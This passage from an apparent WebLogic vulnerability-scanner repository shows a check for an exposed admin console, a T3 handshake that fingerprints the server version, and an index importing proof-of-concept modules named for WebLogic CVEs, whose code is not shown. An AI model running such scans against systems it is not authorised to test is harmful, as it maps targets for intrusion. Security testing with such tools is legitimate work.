dip = sys.argv[1] 72 | dport = int(sys.argv[2]) 73 | run(dip,dport) -------------------------------------------------------------------------------- /poc/Console.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import sys 12 | import requests 13 | from config.config_requests import headers 14 | 15 | 16 | def islive(ur,port): 17 | url='http://' + str(ur)+':'+str(port)+'/console/login/LoginForm.jsp' 18 | r = requests.get(url, headers=headers) 19 | return r.status_code 20 | 21 | def run(url,port): 22 | if islive(url,port)==200: 23 | u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp' 24 | return (1,"[+] [{}] Weblogic console address is exposed! 
The path is: {}".format(url+':'+str(port),u)) 25 | else: 26 | return (0,"[-] [{}] Weblogic console address not found!".format(url+':'+str(port))) 27 | 28 | if __name__=="__main__": 29 | url = sys.argv[1] 30 | port = int(sys.argv[2]) 31 | run(url,port) 32 | -------------------------------------------------------------------------------- /poc/Whoareu.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | ''' 10 | import re 11 | import socket 12 | from time import sleep 13 | 14 | def whoareu(rip,rport): 15 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | server_address = (rip, rport) 17 | sock.connect(server_address) 18 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 19 | sleep(1) 20 | try: 21 | v=(re.findall(r'HELO:(.*?).false', sock.recv(1024).decode()))[0] 22 | if v: 23 | return (1,"[+] [{}] Weblogic Version Is {}".format(rip+':'+str(rport),v)) 24 | else: 25 | return (0,"[-] [{}] Weblogic Version Recognition Failed".format(rip+':'+str(rport))) 26 | except: 27 | return (0, "[-] [{}] Weblogic Version Recognition Failed".format(rip + ':' + str(rport))) 28 | 29 | def run(rip,rport): 30 | return whoareu(rip,rport) -------------------------------------------------------------------------------- /poc/index.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| 
\_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | ''' 10 | from poc import Console 11 | from poc import CVE_2014_4210 12 | from poc import CVE_2016_0638 13 | from poc import CVE_2016_3510 14 | from poc import CVE_2017_10271 15 | from poc import CVE_2017_3248 16 | from poc import CVE_2017_3506 17 | from poc import CVE_2018_2628 18 | from poc import CVE_2018_2893 19 | from poc import CVE_2018_2894 20 | from poc import CVE_2019_2725 21 | from poc import CVE_2019_2729 22 | from poc import CVE_2019_2890 23 | from poc import Whoareu 24 | 25 | pocindex=['Whoareu','Console', 'CVE_2014_4210', 'CVE_2016_0638', 'CVE_2016_3510', 'CVE_2017_10271', 'CVE_2017_3248', 'CVE_2017_3506', 'CVE_2018_2628', 'CVE_2018_2893', 'CVE_2018_2894', 'CVE_2019_2725', 'CVE_2019_2729', 'CVE_2019_2890'] 26 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | fake_useragent==0.1.11 2 | requests==2.23.0 3 | -------------------------------------------------------------------------------- /target.txt: -------------------------------------------------------------------------------- 1 | 127.0.0.1:7001 2 | 172.19.19.19 --------------------------------------------------------------------------------